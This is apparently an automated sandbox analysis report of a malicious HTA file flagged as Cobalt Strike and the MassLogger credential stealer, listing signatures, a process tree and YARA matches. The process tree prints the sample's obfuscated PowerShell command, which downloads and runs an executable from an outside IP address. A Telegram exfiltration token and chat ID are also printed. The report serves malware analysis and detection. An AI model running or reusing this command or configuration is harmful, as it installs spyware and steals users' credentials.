Windows
Analysis Report
niceworkingskillwithbestideasevermade.hta
Overview
General Information
Detection
Cobalt Strike, MSIL Logger, MassLogger RAT
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 1988 cmdline:
mshta.exe "C:\Users\ user\Deskt op\nicewor kingskillw ithbestide asevermade .hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) cmd.exe (PID: 5760 cmdline:
"C:\Window s\system32 \cmd.exe" "/c poWERS hELl -eX BYpASs -nop -w 1 -C devICecre DeNTIaLDeP lOYment.eX e ; IeX( $(Iex('[sY stem.TEXT. ENCodIng]' +[CHaR]0x3 A+[Char]0X 3a+'UtF8.g eTStrING([ SYsTEm.Con vERt]'+[CH AR]58+[ChA R]58+'FRom base64Stri ng('+[chAr ]34+'JE0gI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CA9ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgYWR ELVRZUEUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtTWVNQkV yZEVGaU5Jd ElPbiAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICd bRGxsSW1wb 3J0KCJVUmx Nb04iLCAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI ENoYXJTZXQ gPSBDaGFyU 2V0LlVuaWN vZGUpXXB1Y mxpYyBzdGF 0aWMgZXh0Z XJuIEludFB 0ciBVUkxEb 3dubG9hZFR vRmlsZShJb nRQdHIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB naVl1R0pHW m96YixzdHJ pbmcgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICB3V CxzdHJpbmc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBndWxub 0xiQnosdWl udCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHJmR UpjemxLdHh KLEludFB0c iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIGpWVHp 1VnJYKTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW5BbUU gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAiT0JxY 1p2IiAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 OQW1Fc1BhY 0UgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBVSVJ SQVkgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtU GFzc1RocnU 7ICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgJE06O lVSTERvd25 sb2FkVG9Ga WxlKDAsImh 0dHA6Ly8xO TguMTIuODk uMjQvMTIzL 2Nhc3NlLmV 4ZSIsIiRFT nY6QVBQREF UQVxjYXNzZ S5leGUiLDA sMCk7c1RhU nQtc2xFZXA oMyk7SW5Wb 2tFLWl0ZU0 gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAiJGVOV jpBUFBEQVR BXGNhc3NlL mV4ZSI='+[ CHAr]34+') )')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 3036 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6796 cmdline:
poWERShELl -eX BYp ASs -nop -w 1 -C dev ICecreDeNT IaLDePlOYm ent.eXe ; IeX($(Ie x('[sYstem .TEXT.ENCo dIng]'+[CH aR]0x3A+[C har]0X3a+' UtF8.geTSt rING([SYsT Em.ConvERt ]'+[CHAR]5 8+[ChAR]58 +'FRombase 64String(' +[chAr]34+ 'JE0gICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICA9I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgYWRELVR ZUEUgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtT WVNQkVyZEV GaU5JdElPb iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICdbRGx sSW1wb3J0K CJVUmxNb04 iLCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIENoY XJTZXQgPSB DaGFyU2V0L lVuaWNvZGU pXXB1YmxpY yBzdGF0aWM gZXh0ZXJuI EludFB0ciB VUkxEb3dub G9hZFRvRml sZShJbnRQd HIgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBnaVl 1R0pHWm96Y ixzdHJpbmc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICB3VCxzd HJpbmcgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB ndWxub0xiQ nosdWludCA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIHJmRUpje mxLdHhKLEl udFB0ciAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI GpWVHp1VnJ YKTsnICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL W5BbUUgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA iT0JxY1p2I iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIC1OQW1 Fc1BhY0UgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBVSVJSQVk gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAtUGFzc 1RocnU7ICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gJE06OlVST ERvd25sb2F kVG9GaWxlK DAsImh0dHA 6Ly8xOTguM TIuODkuMjQ vMTIzL2Nhc 3NlLmV4ZSI sIiRFTnY6Q VBQREFUQVx jYXNzZS5le GUiLDAsMCk 7c1RhUnQtc 2xFZXAoMyk 7SW5Wb2tFL Wl0ZU0gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA iJGVOVjpBU FBEQVRBXGN hc3NlLmV4Z SI='+[CHAr ]34+'))')) )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) csc.exe (PID: 8260 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\rc1uxl4b \rc1uxl4b. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) cvtres.exe (PID: 8276 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S40A0.tmp" "c:\Users \user\AppD ata\Local\ Temp\rc1ux l4b\CSC86B 1AEBB56F14 E089D24D17 44B11DAAD. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) casse.exe (PID: 8360 cmdline:
"C:\Users\ user\AppDa ta\Roaming \casse.exe " MD5: CCF58F1C31418CE9C8929DDE25203F6C) RegSvcs.exe (PID: 8384 cmdline:
"C:\Users\ user\AppDa ta\Roaming \casse.exe " MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- cleanup
{"EXfil Mode": "Telegram", "Telegram Token": "7996508565:AAHHBM6wSJS6GosO-ff2t38cxPw1t-vbBj8", "Telegram Chatid": "5758197122"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
| |
Click to see the 17 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
| |
Click to see the 13 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Michael Haag: |